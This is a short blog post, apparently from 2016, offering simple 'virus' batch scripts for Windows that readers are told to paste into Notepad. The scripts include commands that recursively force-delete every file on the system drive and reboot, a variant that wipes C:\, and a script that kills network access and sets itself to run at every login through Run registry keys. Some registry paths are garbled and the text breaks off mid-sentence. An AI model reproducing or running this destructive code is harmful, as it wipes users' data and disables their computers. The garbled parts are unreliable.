Posts

Showing posts from January 25, 2016

SIMPLE VIRUS WRITTTING FOR WINDOWS PC

IMP. Note>>  I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept . All Scripts Here Are To Be Copied In Note Pad >>This Virus Deletes All The Content Of A Drive... @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code a .bat file >>Disable Internet Permanently Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE >>The Most Simple Virus To Crush The Window @Echo off Del C:\ *.*  Save It As Anything.bat > > Th is Will Crash Ur Computer Option Exp